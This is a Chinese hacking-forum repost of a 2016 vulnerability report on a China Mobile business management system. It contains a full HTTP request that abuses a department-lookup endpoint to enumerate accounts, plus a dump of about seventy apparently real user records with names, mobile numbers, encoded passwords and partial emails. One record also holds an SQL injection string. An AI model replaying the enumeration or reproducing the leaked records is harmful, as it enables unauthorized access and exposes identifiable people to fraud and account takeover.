HanDs
管理员

[7月漏洞公开] 中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

泄露用户所有信息、账号、姓名、手机、邮箱、密码

详细说明:

注册个账号后,http://**.**.**.**/si/portal/register.jsp

3.png



然后有这么一个请求

code 区域
POST /server/auth/findDepartment.action HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/si/auth/individual/modifyInfo.jsp
Content-Length: 81
Cookie: JSESSIONID=1A377EC122C2A8227B6A7CF45563F33D
X-Forwarded-For: **.**.**.**
Connection: close

department.departmentId=1016481&ticket=1A377EC122C2A8227B6A7CF45563F33D&domain=si



然后可以遍历

1.png



泄露的信息,

2.png



code 区域
Payload	"loginName":"	"mobile":"	"password":"	"realName":"	"email":"	Comment
1016621 进学科技 18813396658 CeISzPMC2oO4nU9WFUNQ\/Q== 进学科技 303963631@**.**.**.**
1016301 讯宇创世 13621097201 iGlWz5LuREiprjVCAiHbiA== 北京讯宇创世科技有限公司 cmgame@**.**.**.**
1016681 测试1006 15815352980 ZDIaYXYBbhr8cpDG5tY+8Q== 测试账号 359976215@**.**.**.**
1016723 泉龙达科技 13516205707 KJbjdP5gykFLm0JWvvWUzg== quanlongda 13516205707@**.**.**.**
1016722 泉龙达 13516205707 7lc6DxnLTqqVJMY+wZVgOg== quanlongda 13516205707@**.**.**.**
1016421 企业闪信-景心 15022201502 qHg+qyGTkbDWbP2gxyVccw== 裴玲艳 peilingyan@**.**.**.**
1016781 zhubing1225 13668676669 P9nDLMzDErI69q4hVisVQw== 122500 178765322@**.**.**.**
1016161 zhongxingwangka 13602128111 Y4V1f1qAiVE+OF7bgS8LNg== zhongxingwangka oper1@**.**.**.**
1016361 zhaoxfa 18832684116 7X110ojWIOFodjucaMA\/lQ== 赵小飞 951288307@**.**.**.**
1015901 zhangwei 15218848009 6QwNLmgNjG69\/1M\/8klGbA== zhangwei 294660560@**.**.**.**' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
1015841 z123456 18896724354 o9vP55LnoGaqBWQVy3qmnA== z123456 123@**.**.**.**
1015922 yanduwei 13911943880 S5dxthIwcYbfpEc9Its39A== yanduwei 276860265@**.**.**.**
1016061 wshh2008 15182011250 ZOzKC39Bp4pXpQj3giWdpQ== haha 395003125@**.**.**.**
1016102 wenhao 13548839276 nQ4E\/Zs2tm4Ocr72v2GR3g== wenhao 1769491495@**.**.**.**
1016263 wangqihua 15880229257 QREKrGkgkylK61Mcy209WQ== 中国移动通信福建有限公司 360429197@**.**.**.**
1016541 tjsckj 13622132507 GgLpX94IDfj7ZF\/DlE0uNQ== shengchuang yudejiang@**.**.**.**
1016121 tester017 13148375348 ixs3lKoOJQT3Hxu6hRgZTg== tester017 iopiop121@**.**.**.**
1016463 test2 15294567856 rX\/QAx5z67PYIq6XIPjqpg== test2 test@**.**.**.**
1015881 test123456 13434231234 XsS48YTyTRBeUcespeyHvg== masaya tktktktk0001@**.**.**.**
1015941 test1 15034518061 4uieWn2tMmSiIX8omL14Pw== 发送到 admin@**.**.**.**
1016701 szsqld 13554915786 Y7v2SyFEqFG1eufU1sXVYA== 深圳市泉龙达科技发展有限公司 13554915786@**.**.**.**
1016783 sunzhix 15263321415 K\/Zo5bqjwKhmFEkFCG13Pg== 孙志祥 15263321415@**.**.**.**
1016721 slyslan 15060316212 8gB+t71sH8eWIKk4XYVNww== slyslan 418222920@**.**.**.**
1016201 sis1975 13904513134 Q8kPHlN2XNdd86iPRUrcIg== 网络运营 1712347309@**.**.**.**
1016801 sim_admin 13718580212 944t\/HSlXQWSado+0S65Ig== sunyu 1608489185@**.**.**.**
1016401 shenhongjian 13967225961 7OC3UfnoeZdzrWeMamdqUA== shenhongjian 954059412@**.**.**.**
1016822 nstest2 13811111111 i4ZCznTk8jYEE8U5UeFFHQ== nstest2 10001@**.**.**.**
1016821 nstest 13811111111 vj3dBP1vke26OaY035OU2Q== nstest2 10001@**.**.**.**
1015782 nbl1986 15000554866 V1McDH8ucD8cSJnCkIHhnQ== 1 58569600@**.**.**.**
1016841 mykjava2 13825612079 kF4uWtkMQWpgr24YrOLUHw== mykjava2 thinkyou123@**.**.**.**
1016181 lywswyk 13583108972 Cy\/kwQ8fPM6VdWW0EAR2Aw== lywswyk lywswyk@**.**.**.**
1016601 loveCS1763 13528212007 bZYR3bAiKD8mnWjVWm6IJQ== loveCS1763 [email protected]
1016521 lirk.jsyt 13956325007 pjenJK3ie5ADYbMJPJQ4SQ== jeoco_lirk lirk.jsyt@**.**.**.**
1016381 kissxxzz 13911139733 Qt3leMO0Xbx+9HQv\/2RfWA== hlj 2016hyh@**.**.**.**
1016661 jiaoxiang 18252121859 rgCNC+6JsRER7V2Ih9+oZg== jiaoxiang jiaoxl1986@**.**.**.**
1015981 jiangsenxing 15961705638 9oDaCo20G5XHm70+RHsfiw== 蒋森兴 1149785673@**.**.**.**
1016281 hujiashun 18858360175 4z0q16ok0ljeAoG8dEuFww== hujiashun 1096024041@**.**.**.**
1016441 hubeillwy 13995777715 FG7VXATANx29\/Lizvv5jcw== 湖北联利伟业 lijian@**.**.**.**
1016561 huangxiaohui 13849612123 GQ6723zegGniaHl\/5IXerg== huangxiaohui huangxiaohui@**.**.**.**
1016782 huanggua 15911111111 xr\/Bxseo87VIvw3A7eBKug== huanggua 123@**.**.**.**
1016241 heshiwo 13521202355 fZ3qfNYQZ5PsxaiG7Q\/oAA== heshiwo 13521202355@**.**.**.**
1016641 djl1122 15285911190 CIkHWubsPdFDSXY1Xxmg+w== 抢油 593143291@**.**.**.**
1015801 cla2101 18852486269 Z+e3Zzc6Yh22OnaW7+Ze8g== 书生 clcumt@**.**.**.**
1016101 cj858cj 15010028119 e37s9S4CmnPbM2JQ0Ku2qA== 陈金秋 719991984@**.**.**.**
1016461 chongfeng 13926600450 NlUEqqQuKLk7mNXqJEeLkA== chongfeng 1662331663@**.**.**.**
bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 blackmanba.china@**.**.**.**
1016861 bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 blackmanba.china@**.**.**.**
1015961 ak47 15219118952 Ywr4HoEQE3ZShShgAexIXg== ak47 1@**.**.**.**
1016462 adminaa 15189658965 ijxvJr0NAd8VumT\/io4edA== adminaa 58965@**.**.**.**
1016262 admin2 15845454545 3N5INq8n64wdMAes78F9Vg== 123 dasd@**.**.**.**
1016321 admin1 13875467890 OoJxQp8a\/Osl1k7Rwfw33A== 1234532 123@**.**.**.**
1015921 aa17951 15929807202 p6VBBpZ7noQxT05+UazKow== aaqqww 15929807202@**.**.**.**
1016042 979091907 13936027352 T5AizXVVPQnxflzuIdXJjg== 李强 979091907@**.**.**.**
1016581 2766118665 18216678939 6Nr7KvQNnyOO7A6XN6gO3Q== 诸城代理商 2766118665@**.**.**.**
1016001 204930 15049133333 Fv7M4AmS8NsJOvZyuqv\/RA== 204930 2859515123@**.**.**.**
1016041 1q 13843723521 Isv+O\/af0mXsFxFFXmAuOA== q1 138@**.**.**.**
1016761 1979376171 15845317539 XS\/EFF3H+Z+\/L8NwTiuIVQ== Sunday 1979376171@**.**.**.**
1016081 18799889778 13899159892 QDjuS2h2mwhrNaRiKlVbuw== 18799889778 [email protected]
1016021 18701256780 15229393711 b7JzgOV3gNp7bYRu4qzbrA== 武三刚 18701256780@**.**.**.**
1015821 18283823693 18283823693 khHcAZllpIHxxA4FgBZoMw== shimin 125832760@**.**.**.**
1016261 15880228257 15845454545 e+LNiQQBEIpF3EuFTgzIwg== admin2' dasd@**.**.**.**
1016501 15834726140 15834726140 ltDPXYKN59kguPW7jdN\/Kg== 李佳霖 [email protected]
1016221 15138776956 15138776956 sQIowoMKkEalUtSE\/dgAqQ== 谷旭娜 121836747@**.**.**.**
1016741 13516003391 13516003391 r7Y3VOhGxCwrBRDplDATVQ== z1290421091 1290421091@**.**.**.**
1016141 13479690747 13479690747 VbIVJswIvOwd891tYMuOKw== 承诺 10714886@**.**.**.**
1015861 13476003630 13476003630 SKQ5Kv1PRPbw3wdq\/s57vA== sgz 13476003630@**.**.**.**
1016341 123 13800013800 ZKzJWdQgEP9LW8qI1MfPWA== 123 123@**.**.**.**
1016481 1005011194 15825928568 OFpxWgDuOXocWWm\/dZBiUA== Andy 1005011194@**.**.**.**

漏洞证明:

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:1
a3085243
NO.2


学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

WwW.fbisB.CoM 追逐梦想,万一实现了呢!

a3085243正在逛黑客教程网www.fbisb.com,学会了入侵网站找漏洞,奖励4个金币。网络就像罂粟,美丽如媚,危险如恶!

2017-3-4 #2楼
游客组
快速回复